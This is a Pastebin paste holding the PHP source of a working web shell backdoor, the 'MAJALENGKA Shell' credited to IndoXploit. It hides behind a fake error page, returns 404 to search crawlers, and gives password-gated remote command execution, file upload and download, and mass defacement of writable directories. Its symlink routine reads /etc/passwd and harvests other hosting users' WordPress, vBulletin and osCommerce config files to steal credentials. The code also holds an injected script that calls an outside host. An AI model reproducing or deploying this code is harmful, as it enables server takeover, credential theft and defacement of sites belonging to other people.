kangindex666

sc shell notfound

Jan 19th, 2018
241
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 176.63 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "755596d6d2855c6b49527891bca4f7c7"; // default: dicobadulu74
  14. $color = "#00FFFF";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <title>404 Not Found</title>
  29. </head><body>
  30. <h1>Internal Server Error</h1>
  31. <p>The server encountered an internal error or
  32. misconfiguration and was unable to complete
  33. your request.</p>
  34. <p>More information about this error may be available
  35. in the server error log.</p>
  36. <p>Additionally, a 500 Internal Server Error
  37. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  38. <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + 4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mKap%2fU%2fdghZh5KD%2bygGB66u109sG7g0XwyLTWIaEGJMD160n8dooPMrUsrnXleDvz8OfVm65mNojMPO1ib2XE1%2bqIy1Ayzfo%2bgxurhIBeEj2Bkp%2fLvUADeZ9mohFwpLB%2b8mMZ4gBcp6pCNhKAWo6IbiI%2b9ck%2bDjKoCugo2tyEj1yHUqSZry6HK1oY9n8LQpk6lURxRTVAWgzvOGQJObVhP1DgglhDpm4ozu4C8H9ncYnukMuN9STr3y7hC1afDC5okJj1hHRhJqHIC7zdLoiy2%2bGOLoxdmphzF53zu%2f5X%2fZ3gfXq4aM2BXdbNrGMfvtPMLYS2yLncjpeWOyzThA9C1qXH1oE%2b03QaxwIo%2bsTW3hK%2f0GmzydK%2bour73ZvCkhnQStsZnBy11zGF3PTcQQ1LujWmTcB92GA9Xp0CnQoVn2D3EnUkMCXOT30HjQAC8PL0L2HdMq6ilyp8Sqcjg22cqez5OYY4IxbdCWcjZuX0gmhFSsRr6hofW1Y9Ho2lGy5w + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body></html>
  39. </pre>
  40. </header>
  41. <style>
  42. input { margin:0;background-color:#fff;border:2px solid #fff; }
  43. </style>
  44. <form method="post">
  45. <input type="password" name="pass">
  46. </form>
  47.  
  48. <?php
  49. exit;
  50. }
  51. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  52. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  53. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  54. else
  55. login_shell();
  56. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  57. @ob_clean();
  58. $file = $_GET['file'];
  59. header('Content-Description: File Transfer');
  60. header('Content-Type: application/octet-stream');
  61. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  62. header('Expires: 0');
  63. header('Cache-Control: must-revalidate');
  64. header('Pragma: public');
  65. header('Content-Length: ' . filesize($file));
  66. readfile($file);
  67. exit;
  68. }
  69. ?>
  70. <html>
  71. <head>
  72. <link rel="icon" href="https://vignette.wikia.nocookie.net/vampirewars/images/e/e5/Skeletal_Ghost.png/revision/latest?cb=20111009191857" type="image/x-icon"/>
  73. <title>MAJALENGKAHACKER Shell</title>
  74. <meta name='author' content='Majalengka Cyber Team'>
  75. <meta charset="UTF-8">
  76. <style type='text/css'>
  77. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  78. html {
  79. background: black;
  80. color: red;
  81. font-family: 'Ubuntu';
  82. font-size: 20px;
  83. width: 100%;
  84. }
  85. li {
  86. display: inline;
  87. color: red;
  88. margin: 5px;
  89. padding: 5px;
  90. }
  91. table, th, td {
  92. border-collapse:collapse;
  93. font-family: Tahoma, Geneva, sans-serif;
  94. background: transparent;
  95. font-family: 'Ubuntu';
  96. font-size: 13px;
  97. }
  98. .table_home, .th_home, .td_home {
  99. border: 1px solid lime;
  100. }
  101. .table_home td:hover {
  102. background: #635F5F;
  103. }
  104. th {
  105. padding: 10px;
  106. border-color: #BDBDBD;
  107. }
  108. a {
  109. color: #ffffff;
  110. text-decoration: none;
  111. }
  112. a:hover {
  113. color: cyan;
  114. text-decoration: underline;
  115. }
  116. b {
  117. color: gold;
  118. }
  119. input[type=text], input[type=password],input[type=submit] {
  120. background: transparent;
  121. color: #ffffff;
  122. border: 1px solid lime;
  123. margin: 5px auto;
  124. padding-left: 5px;
  125. font-family: 'Ubuntu';
  126. font-size: 13px;
  127. }
  128. textarea {
  129. border: 1px solid lime;
  130. width: 100%;
  131. height: 400px;
  132. padding-left: 5px;
  133. margin: 10px auto;
  134. resize: none;
  135. background: transparent;
  136. color: red;
  137. font-family: 'Ubuntu';
  138. font-size: 13px;
  139. }
  140. select {
  141. width: 152px;
  142. background: #000000;
  143. color: cyan;
  144. border: 1px solid lime;
  145. margin: 5px auto;
  146. padding-left: 5px;
  147. font-family: 'Ubuntu';
  148. font-size: 13px;
  149. }
  150. option:hover {
  151. background: cyan;
  152. color: #000000;
  153. }
  154. .muter {
  155. onmousedown:stop;
  156. animation-name: rotate ;
  157. animation-duration: 5s;
  158. animation-play-state: running;
  159. animation-timing-function: linear;
  160. animation-iteration-count: infinite;
  161. opacity: 1.0;filter: alpha(opacity=50);}
  162.  
  163. .muter:hover {opacity: 1.0;filter: alpha(opacity=100);}
  164.  
  165. @keyframes rotate{
  166. 10% {transform:rotateY(36deg)}
  167. 20% {transform:rotateY(72deg)}
  168. 30% {transform:rotateY(108deg)}
  169. 40% {transform:rotateY(144deg)}
  170. 50% {transform:rotateY(180deg)}
  171. 60% {transform:rotateY(216deg)}
  172. 70% {transform:rotateY(252deg)}
  173. 80% {transform:rotateY(288deg)}
  174. 90% {transform:rotateY(324deg)}
  175. 100% {transform:rotateY(360deg)}
  176. }
  177. .phpinfo table{width:100%;padding:0 0 0 0;}
  178. .phpinfo td{background:black;color:lime;padding:6px 8px;;}
  179. .phpinfo th, th{background:#191919;border-bottom:1px solid #333333;font-weight:normal;}
  180. .phpinfo h2, .phpinfo h2 a{text-align:center;font-size:16px;padding:0;margin:30px 0 0 0;background:#222222;padding:4px 0;}
  181. .human{
  182. border:2px solid lime;
  183. }
  184. .tersakiti{
  185. border:2px solid lime;
  186. background: lime;
  187. }
  188. </style>
  189. </head>
  190. <script language='javascript'>
  191. if (document.all||document.getElementById){
  192. var thetitle=document.title
  193. document.title=''
  194. }
  195. var data="@#$%&-+()*!?";
  196. var done=1;
  197. function statusIn(text){
  198. decrypt(text,5,50);
  199. }
  200. function statusOut(){
  201. self.status='';
  202. done=1;
  203. }
  204. function decrypt(text, max, delay){
  205. if (done){
  206. done = 0;
  207. rantit(text, max, delay, 0, max);
  208. }
  209. }
  210. function rantit(text, runs_left, delay, charvar, max){
  211. if (!done){
  212. runs_left = runs_left - 1;
  213. var status = text.substring(0,charvar);
  214. for(var current_char = charvar; current_char < text.length; current_char++){
  215. status += data.charAt(Math.round(Math.random()*data.length));
  216. }
  217. document.title = status;
  218. var rerun = "rantit('" + text + "'," + runs_left + "," + delay + "," + charvar + "," + max + ");"
  219. var new_char = charvar + 1;
  220. var next_char = "rantit('" + text + "'," + max + "," + delay + "," + new_char + "," + max + ");"
  221. if(runs_left > 0){
  222. setTimeout(rerun, delay);
  223. }
  224. else{
  225. if (charvar < text.length){
  226. setTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));
  227. }
  228. else
  229. {
  230. done = 1;
  231. }
  232. }
  233. }
  234. }
  235. if (document.all||document.getElementById)
  236. statusIn(thetitle)
  237. </script>
  238. <?php
  239. ###############################################################################
  240. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
  241. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
  242. // Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
  243. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
  244. // Greetz: All Member IndoXploit. & all my friends.
  245. ###############################################################################
  246. function w($dir,$perm) {
  247. if(!is_writable($dir)) {
  248. return "<font color=red>".$perm."</font>";
  249. } else {
  250. return "<font color=cyan>".$perm."</font>";
  251. }
  252. }
  253. function r($dir,$perm) {
  254. if(!is_readable($dir)) {
  255. return "<font color=red>".$perm."</font>";
  256. } else {
  257. return "<font color=cyan>".$perm."</font>";
  258. }
  259. }
  260. function exe($cmd) {
  261. if(function_exists('system')) {
  262. @ob_start();
  263. @system($cmd);
  264. $buff = @ob_get_contents();
  265. @ob_end_clean();
  266. return $buff;
  267. } elseif(function_exists('exec')) {
  268. @exec($cmd,$results);
  269. $buff = "";
  270. foreach($results as $result) {
  271. $buff .= $result;
  272. } return $buff;
  273. } elseif(function_exists('passthru')) {
  274. @ob_start();
  275. @passthru($cmd);
  276. $buff = @ob_get_contents();
  277. @ob_end_clean();
  278. return $buff;
  279. } elseif(function_exists('shell_exec')) {
  280. $buff = @shell_exec($cmd);
  281. return $buff;
  282. }
  283. }
  284. function perms($file){
  285. $perms = fileperms($file);
  286. if (($perms & 0xC000) == 0xC000) {
  287. // Socket
  288. $info = 's';
  289. } elseif (($perms & 0xA000) == 0xA000) {
  290. // Symbolic Link
  291. $info = 'l';
  292. } elseif (($perms & 0x8000) == 0x8000) {
  293. // Regular
  294. $info = '-';
  295. } elseif (($perms & 0x6000) == 0x6000) {
  296. // Block special
  297. $info = 'b';
  298. } elseif (($perms & 0x4000) == 0x4000) {
  299. // Directory
  300. $info = 'd';
  301. } elseif (($perms & 0x2000) == 0x2000) {
  302. // Character special
  303. $info = 'c';
  304. } elseif (($perms & 0x1000) == 0x1000) {
  305. // FIFO pipe
  306. $info = 'p';
  307. } else {
  308. // Unknown
  309. $info = 'u';
  310. }
  311. // Owner
  312. $info .= (($perms & 0x0100) ? 'r' : '-');
  313. $info .= (($perms & 0x0080) ? 'w' : '-');
  314. $info .= (($perms & 0x0040) ?
  315. (($perms & 0x0800) ? 's' : 'x' ) :
  316. (($perms & 0x0800) ? 'S' : '-'));
  317. // Group
  318. $info .= (($perms & 0x0020) ? 'r' : '-');
  319. $info .= (($perms & 0x0010) ? 'w' : '-');
  320. $info .= (($perms & 0x0008) ?
  321. (($perms & 0x0400) ? 's' : 'x' ) :
  322. (($perms & 0x0400) ? 'S' : '-'));
  323. // World
  324. $info .= (($perms & 0x0004) ? 'r' : '-');
  325. $info .= (($perms & 0x0002) ? 'w' : '-');
  326. $info .= (($perms & 0x0001) ?
  327. (($perms & 0x0200) ? 't' : 'x' ) :
  328. (($perms & 0x0200) ? 'T' : '-'));
  329. return $info;
  330. }
  331. function hdd($s) {
  332. if($s >= 1073741824)
  333. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  334. elseif($s >= 1048576)
  335. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  336. elseif($s >= 1024)
  337. return sprintf('%1.2f',$s / 1024 ) .' KB';
  338. else
  339. return $s .' B';
  340. }
  341. function ambilKata($param, $kata1, $kata2){
  342. if(strpos($param, $kata1) === FALSE) return FALSE;
  343. if(strpos($param, $kata2) === FALSE) return FALSE;
  344. $start = strpos($param, $kata1) + strlen($kata1);
  345. $end = strpos($param, $kata2, $start);
  346. $return = substr($param, $start, $end - $start);
  347. return $return;
  348. }
  349. function getsource($url) {
  350. $curl = curl_init($url);
  351. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  352. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  353. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  354. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  355. $content = curl_exec($curl);
  356. curl_close($curl);
  357. return $content;
  358. }
  359. function bing($dork) {
  360. $npage = 1;
  361. $npages = 30000;
  362. $allLinks = array();
  363. $lll = array();
  364. while($npage <= $npages) {
  365. $x = getsource("https://www.bing.com/search?q=".$dork."&first=".$npage);
  366. if($x) {
  367. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  368. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  369. $npage = $npage + 10;
  370. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  371. } else break;
  372. }
  373. $URLs = array();
  374. foreach($allLinks as $url){
  375. $exp = explode("/", $url);
  376. $URLs[] = $exp[2];
  377. }
  378. $array = array_filter($URLs);
  379. $array = array_unique($array);
  380. $sss = count(array_unique($array));
  381. foreach($array as $domain) {
  382. echo $domain."\n";
  383. }
  384. }
  385. function reverse($url) {
  386. $ch = curl_init("https://domains.yougetsignal.com/domains.php");
  387. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  388. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  389. curl_setopt($ch, CURLOPT_HEADER, 0);
  390. curl_setopt($ch, CURLOPT_POST, 1);
  391. $resp = curl_exec($ch);
  392. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  393. $array = explode(",,", $resp);
  394. unset($array[0]);
  395. foreach($array as $lnk) {
  396. $lnk = "https://$lnk";
  397. $lnk = str_replace(",", "", $lnk);
  398. echo $lnk."\n";
  399. ob_flush();
  400. flush();
  401. }
  402. curl_close($ch);
  403. }
  404. if(get_magic_quotes_gpc()) {
  405. function human_ss($array) {
  406. return is_array($array) ? array_map('human_ss', $array) : stripslashes($array);
  407. }
  408. $_POST = human_ss($_POST);
  409. $_COOKIE = human_ss($_COOKIE);
  410. }
  411.  
  412. if(isset($_GET['dir'])) {
  413. $dir = $_GET['dir'];
  414. chdir($dir);
  415. } else {
  416. $dir = getcwd();
  417. }
  418. $kernel = php_uname();
  419. $admin_id=$_SERVER['SERVER_ADMIN'];
  420. $software = getenv("SERVER_SOFTWARE");
  421. $d0mains = @file("/etc/named.conf");
  422. $users=@file('/etc/passwd');
  423. if($d0mains)
  424. {
  425. $count;
  426. foreach($d0mains as $d0main)
  427. {
  428. if(@ereg("zone",$d0main))
  429. {
  430. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  431. flush();
  432. if(strlen(trim($domains[1][0])) > 2)
  433. {
  434. flush();
  435. $count++;
  436. }
  437. }
  438. }
  439. }
  440. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  441. $dir = str_replace("\\","/",$dir);
  442. $scdir = explode("/", $dir);
  443. $freespace = hdd(disk_free_space("/"));
  444. $total = hdd(disk_total_space("/"));
  445. $used = $total - $freespace;
  446. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=cyan>OFF</font>";
  447. $ds = @ini_get("disable_functions");
  448. $mysql = (function_exists('mysql_connect')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  449. $curl = (function_exists('curl_version')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  450. $wget = (exe('wget --help')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  451. $perl = (exe('perl --help')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  452. $python = (exe('python --help')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  453. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=cyan>NONE</font>";
  454. if(!function_exists('posix_getegid')) {
  455. $user = @get_current_user();
  456. $uid = @getmyuid();
  457. $gid = @getmygid();
  458. $group = "?";
  459. } else {
  460. $uid = @posix_getpwuid(posix_geteuid());
  461. $gid = @posix_getgrgid(posix_getegid());
  462. $user = $uid['name'];
  463. $uid = $uid['uid'];
  464. $group = $gid['name'];
  465. $gid = $gid['gid'];
  466. }
  467. echo "<font size=5></font>";
  468. echo "System: <font color=white>".$kernel."</font><br>";
  469. echo "User: <font color=white>".$user."</font> (".$uid.") Group: <font color=white>".$group."</font> (".$gid.")<br>";
  470. echo "Server IP: <font color=white>".$ip."</font> | Your IP: <font color=white>".$_SERVER['REMOTE_ADDR']."</font><br>";
  471. echo "PHP Version : <font color=white>".phpversion()."</font> <font color='white'> on</font> <font color=white>".php_sapi_name()."</font> <font class='asu'>[<a href='?dir=$dir&do=phinfo'>PHP Info</a>]</font><br>";
  472. echo "Admin : <font color=white>".$admin_id."</font> | Websites: <font color=white>$count</font> Domains<br>";
  473. echo "HDD: <font color=white>$used</font> / <font color=white>$total</font> ( Free: <font color=white>$freespace</font> )<br>";
  474. echo "Safe Mode: <fomt color=white>$sm</font><br>";
  475. echo "MySQL: <font color=white>$mysql</font> | Perl: <font color=white>$perl</font> | Python: <font color=white>$python</font> | WGET: <font color=white>$wget</font> | CURL: <font color=white>$curl</font><br> <br>";
  476. echo "&nbsp;Current DIR: ";
  477. foreach($scdir as $c_dir => $cdir) {
  478. echo "<a href='?dir=";
  479. for($i = 0; $i <= $c_dir; $i++) {
  480. echo $scdir[$i];
  481. if($i != $c_dir) {
  482. echo "/";
  483. }
  484. }
  485. echo "'>$cdir</a>/";
  486. }
  487. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  488. echo "<br><br><br>";
  489. echo "<center>";
  490. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  491. echo "<font color=red size=5>MAJALENGKA Shell Backdoor</font><br>";
  492. echo "</div>";
  493. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  494. echo "<link href='https://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'><font face='iceland'></font>";
  495. echo "<ul><font face='iceland' size='5'>";
  496. echo "<ul>";
  497. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=upload'> <font color='white'>Upload</font> </a> <font color='lime'>]</font></li>";
  498. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=cmd'> <font color='white'>Command</font> </a> <font color='lime'>]</font></li>";
  499. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=mass_deface'> <font color='white'>Mass Deface</font> </a> <font color='lime'>]</font></li>";
  500. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=config'> <font color='white'>Config</font> </a> <font color='lime'>]</font></li>";
  501. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=jumping'> <font color='white'>Jumping</font> </a> <font color='lime'>]</font></li>";
  502. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=zoneh'> <font color='white'>Zone-H</font> </a> <font color='lime'>]</font><br></li>";
  503. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=cpanel'> <font color='white'>CPanel Crack</font> </a> <font color='lime'>]</font></li>";
  504. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=symlink'> <font color='white'>Symlink</font> </a> <font color='lime'>]</font></li>";
  505. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=smtp'> <font color='white'>SMTP Grabber</font> </a> <font color='lime'>]</font></li>";
  506. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=cgi'> <font color='white'>CGI Telnet</font> </a> <font color='lime'>]</font></li>";
  507. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=adminer'> <font color='white'>Adminer</font> </a> <font color='lime'>]</font></li>";
  508. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=csrf'> <font color='white'>CSRF</font> </a> <font color='lime'>]</font><br></li>";
  509. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=videosex'> <font color='white'>Streaming Bokep</font> </a> <font color='lime'>]</font></li>";
  510. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=auto_edit_user'> <font color='white'>Auto Edit User</font> </a> <font color='lime'>]</font></li>";
  511. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=adw'> <font color='white'>Auto Deface Wordpress</font> </a> <font color='lime'>]</font></li>";
  512. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=aetw'> <font color='white'>Auto Edit Title Wordpress</font> </a> <font color='lime'>]</font><br></li>";
  513. echo "<li><font color='lime'>[</font> <a style='color: red;' href='?logout=true'> <font color='red'>Logout</font> </a> <font color='lime'>]</font></li>";
  514. echo "</ul>";
  515. echo "</center>";
  516. if($_GET['logout'] == true) {
  517. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  518. echo "<script>window.location='?';</script>";
  519. } elseif($_GET['do'] == 'upload') {
  520. echo "<center>";
  521. if($_POST['upload']) {
  522. if($_POST['tipe_upload'] == 'biasa') {
  523. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  524. $act = "<font color=cyan>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  525. } else {
  526. $act = "<font color=red>failed to upload file</font>";
  527. }
  528. } else {
  529. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  530. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  531. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  532. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  533. $act = "<font color=cyan>Uploaded!</font> at <i><b>$root -> </b></i><a href='https://$web' target='_blank'>$web</a>";
  534. } else {
  535. $act = "<font color=red>failed to upload file</font>";
  536. }
  537. } else {
  538. $act = "<font color=red>failed to upload file</font>";
  539. }
  540. }
  541. }
  542. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'> [+] Upload Files [+]</div>";
  543. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  544. echo "<form method='post' enctype='multipart/form-data'>
  545. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  546. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  547. <input type='file' name='ix_file'>
  548. <input type='submit' value='upload' name='upload'>
  549. </form>";
  550. echo $act;
  551. echo "</div>";
  552. } elseif($_GET['do'] == 'cmd') {
  553. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Command [+]</div>";
  554. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  555. echo "<form method='post'>
  556. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  557. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  558. </form>";
  559. echo "</div>";
  560. if($_POST['do_cmd']) {
  561. echo "<pre>".exe($_POST['cmd'])."</pre>";
  562. }
  563. } elseif($_GET['do'] == 'mass_deface') {
  564. function sabun_massal($dir,$namafile,$isi_script) {
  565. if(is_writable($dir)) {
  566. $dira = scandir($dir);
  567. foreach($dira as $dirb) {
  568. $dirc = "$dir/$dirb";
  569. $lokasi = $dirc.'/'.$namafile;
  570. if($dirb === '.') {
  571. file_put_contents($lokasi, $isi_script);
  572. } elseif($dirb === '..') {
  573. file_put_contents($lokasi, $isi_script);
  574. } else {
  575. if(is_dir($dirc)) {
  576. if(is_writable($dirc)) {
  577. echo "[<font color=cyan>DONE</font>] $lokasi<br>";
  578. file_put_contents($lokasi, $isi_script);
  579. $human = sabun_massal($dirc,$namafile,$isi_script);
  580. }
  581. }
  582. }
  583. }
  584. }
  585. }
  586. function sabun_biasa($dir,$namafile,$isi_script) {
  587. if(is_writable($dir)) {
  588. $dira = scandir($dir);
  589. foreach($dira as $dirb) {
  590. $dirc = "$dir/$dirb";
  591. $lokasi = $dirc.'/'.$namafile;
  592. if($dirb === '.') {
  593. file_put_contents($lokasi, $isi_script);
  594. } elseif($dirb === '..') {
  595. file_put_contents($lokasi, $isi_script);
  596. } else {
  597. if(is_dir($dirc)) {
  598. if(is_writable($dirc)) {
  599. echo "[<font color=cyan>DONE</font>] $dirb/$namafile<br>";
  600. file_put_contents($lokasi, $isi_script);
  601. }
  602. }
  603. }
  604. }
  605. }
  606. }
  607. if($_POST['start']) {
  608. if($_POST['tipe_sabun'] == 'mahal') {
  609. echo "<div style='margin: 5px auto; padding: 5px'>";
  610. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  611. echo "</div>";
  612. } elseif($_POST['tipe_sabun'] == 'murah') {
  613. echo "<div style='margin: 5px auto; padding: 5px'>";
  614. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  615. echo "</div>";
  616. }
  617. } else {
  618. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Mass Deface [+]</div>";
  619. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  620. echo "<center>";
  621. echo "<form method='post'>
  622. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  623. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  624. <font style='text-decoration: underline;'>Folder:</font><br>
  625. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  626. <font style='text-decoration: underline;'>Filename:</font><br>
  627. <input type='text' name='d_file' value='majalengka.php' style='width: 450px;' height='10'><br>
  628. <font style='text-decoration: underline;'>majalengka File:</font><br>
  629. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Majalengka Cyber Team</textarea><br>
  630. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  631. </form></center>";
  632. }
  633. }
  634. elseif($_GET['do'] == 'symconfig') {
  635. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  636. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  637. exit;
  638. }
  639. else
  640. {
  641. if($_POST["m"] && !$_POST["passwd"]==""){
  642. @mkdir("Mct_symconf", 0777);
  643. @chdir("majalengka_symconf");
  644. @symlink("/","root");
  645. $htaccess="Options Indexes FollowSymLinks
  646. DirectoryIndex z.htm
  647. AddType text/plain .php
  648. AddHandler text/plain .php
  649. Satisfy Any";
  650. @file_put_contents(".htaccess",$htaccess);
  651. $etc_passwd=$_POST["passwd"];
  652. $etc_passwd=explode("\n",$etc_passwd);
  653. foreach($etc_passwd as $passwd){
  654. $pawd=explode(":",$passwd);
  655. $user =$pawd[0];
  656.  
  657. @symlink('/','mct_symconf/root');
  658. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  659. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  660. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  661. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  662. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  663. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  664. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  665. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  666. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  667. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  668. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  669. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  670. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  671. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  672. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  673. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  674. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  675. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  676. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  677. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  678. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  679. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  680. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
